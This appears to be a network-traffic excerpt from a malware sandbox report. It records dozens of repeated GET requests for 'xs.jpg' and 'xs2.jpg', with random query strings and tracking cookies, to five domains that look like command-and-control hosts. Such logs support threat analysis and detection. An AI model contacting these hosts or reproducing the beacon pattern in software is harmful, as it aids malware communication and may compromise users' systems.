        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8f21b84=600337936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159287|1720159259|3|8|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?96faab4=1108191980 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159288|1720159259|3|8|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9b39c81=651063812 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159288|1720159260|3|8|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a2ff583=854576015 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a95dff7=1598349231 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bc3818e=986810310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159291|1720159259|3|9|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c29ba9f=612184029 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159291|1720159259|3|9|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c814e8b=1888207587 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159292|1720159260|3|9|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cd40c9d=1506564171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?d5ebd9e=2018814606 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e924854=-1850289336 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159295|1720159259|3|10|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?efa2e6a=-2033475142 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159295|1720159259|3|10|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f75905a=1556177436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159296|1720159260|3|10|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?fbaba77=527791342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1055bd73=-1828476661 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1122b37b=1437434215 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159299|1720159259|3|11|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?11c3299b=-1612941709 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159300|1720159259|4|11|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1208a479=1210225124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159300|1720159260|3|11|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?125c9be5=924177327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?12dacc76=1265316312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?13a86083=-1326750565 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159303|1720159259|3|12|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?14106f9c=673242936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159303|1720159259|3|12|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?14890695=-1538771800 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159304|1720159260|3|12|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?14e27329=1051154811 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?155951b4=716350312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1651959c=1123336404 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159307|1720159259|3|13|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?16b3e9bb=-2009630110 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159307|1720159259|3|13|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?170da52a=1547080872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159308|1720159260|3|13|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1786b5d7=1578817372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?180330c9=1611449124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?18be425f=-973991176 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159310|1720159259|3|14|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?194bc1b3=-1324200987 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159311|1720159259|3|14|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?19b3dafe=-414010642 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159312|1720159260|3|14|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?19fa4aca=871667092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1a87f96c=-1624254328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1b477e89=-633605048 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159314|1720159259|3|15|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1bf90ddb=938613686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159315|1720159259|3|15|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1c4eb48e=-970526750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159315|1720159260|3|15|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1c954dcc=1438640484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1d468c2f=-1839153941 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1e16c26e=-1770927066 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1ec6b77a=-1713269406 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1fd1e84b=533850187 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?20c162b1=-1547244171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?211be604=-406631908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2373b5c6=-1915824360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?24e8c9b5=619235765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?253cedcf=1874250093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?26879fc4=1522834916 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?27f237dd=396330763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?29ccf744=-1489773296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2bcaf743=1582807576 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2ca70649=-1098498342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2cfced02=1509546500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?2e7d9d4b=1944906328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3c09d975=2014556906 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3d14cd8b=633027043 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d74bda62=-1365789500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159419|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3f66d776=-1144003526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159420|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ae7223c4=-1178038512 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159420|1720159260|4|40|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c74c2087=-923187898 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?c94ba6e9=1541600443 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9036add6=1088075608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159423|1720159259|4|41|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?737daee5=-839468140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159424|1720159259|4|41|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?215ba763=1119309510 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159424|1720159260|4|41|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?df150ca5=981355486 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?76eabd35=-1523882990 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2896226b=680927851 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e8fd1062=1978557004 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bb7b9d3b=846387121 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159429|1720159260|4|42|0; snkz=8.46.123.33
